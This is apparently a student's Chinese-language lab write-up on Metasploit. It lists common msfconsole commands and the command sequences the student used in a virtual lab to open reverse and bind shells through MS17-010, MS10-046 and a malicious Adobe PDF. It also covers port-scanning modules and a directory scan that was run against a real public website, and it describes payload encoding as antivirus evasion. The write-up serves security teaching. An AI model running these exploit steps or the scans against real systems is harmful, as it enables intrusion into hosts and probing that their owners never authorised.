标签:loader modules 完整 控制台 测试 tcp image iar freebsd
(1)msf 模块说明
(2)msf常用漏洞利用命令
search name
:用指定关键字搜索可以利用的漏洞模块use exploit name
:使用漏洞show options
:显示配置选项set option name option
:设置选项show payloads
:回链攻击载荷show targets
: 显示目标(os版本)set TARGET target number
:设置目标版本exploit
:开始漏洞攻击sessions -l
:列出会话sessions -i id
:选择会话sessions -k id
:结束会话Ctrl+z
:把会话放到后台Ctrl+c
:结束会话show auxiliary
:显示辅助模块use auxiliary name
:使用辅助模块set option name option
:设置选项exploit
:运行模块
(由于重装虚拟机,未能及时将文件名改为学号)
shell_reverse_tcp
,输入指令 set payload generic/shell_reverse_tcp
设置 payload 为反向 tcp 连接。set RHOST 192.168.145.132 //设置靶机IP set LPORT 4323 //设置攻击机端口 set LHOST 192.168.145.131//设置攻击机IP exploit
search ms17_010
指令查询一下针对该漏洞能够运用的攻击模块。set payload windows/x64/meterpreter/bind_tcp
设置 payload 为绑定 tcp 连接。set RHOST 192.168.145.133 //设置靶机IP set LPORT 4323 //设置攻击机端口 set LHOST 192.168.145.131 //设置攻击机IP exploit
search ms10_046
先找相关漏洞模块。use windows/browser/ms10_046_shortcut_icon_dllloader
,使用show payloads
查找有效攻击载荷。set payload windows/meterpreter/reverse_tcp //选择攻击载荷 set LHOST 192.168.145.131 //设置攻击者IP set SRVHOST 192.168.145.131 //设置服务器IP(攻击者IP) exploit //进行攻击
use windows/fileformat/adobe_cooltype_sing
设置模块。set payload windows/meterpreter/bind_tcp
设置 payloadsset RHOST 192.168.145.132 //靶机ip set LPORT 4323 //攻击端口 exploit //生成pdf
back
退出当前模块,进入监听模块。use exploit/multi/handler //进入监听模块 set payload windows/meterpreter/bind_tcp //选择攻击载荷 set RHOST 192.168.145.132 //靶机IP set LPORT 4323 //攻击端口 exploit
show auxiliary
查看所有的辅助模块。info scanner/steam/server_info
查看模块信息。use scanner/steam/server_info /使用漏洞
set RHOSTS 192.168.145.131 /起始IP exploit /开始攻击
set THREADS 50 set RHOSTS www.baidu.com exploit
dir_scanner 模块发现了百度网站目录的 cache http 状态码 200 ,表示请求成功。
端口扫描模块。
具体有以下几种扫描方式:
auxiliary/scanner/portscan/ack
:通过 ACK 扫描的方式对防火墙上未被屏蔽的端口进行探测。auxiliary/scanner/portscan/ftpbounce
:通过 FTP bounce 攻击的原理对 TCP 服务进行枚举,在一些旧的Solaris及FreeBSD系统的FTP服务中此类攻击方式仍能被利用。auxiliary/scanner/portscan/syn
:使用发送 TCP SYN 标志的方式探测开放的端口。auxiliary/scanner/portscan/tcp
:通过一次完整的 TCP 连接来判断端口是否开放。auxiliary/scanner/portscan/xmas
:通过发送 FIN、PSH、URG 标志,相对而言较为隐蔽。试试 tcp 扫描,通过一次完整的 TCP 连接来判断端口是否开放。
输入use auxiliary/scanner/portscan/tcp
设置模块。
设置参数:
set RHOSTS 192.168.145.132 /靶机IP set THREADS 50 exploit
Q:用自己的话解释什么是exploit,payload,encode?
A:exploit——是一个漏洞攻击的工具,可以用来将恶意代码、漏洞注入靶机中。
payload——是有效荷载,是用来真正实施攻击的恶意代码。
encode——是编码,相当于是给 payload 披一件外套,让杀软难以分辨。
标签:loader modules 完整 控制台 测试 tcp image iar freebsd
原文地址:https://www.cnblogs.com/174323jiaxin/p/12817385.html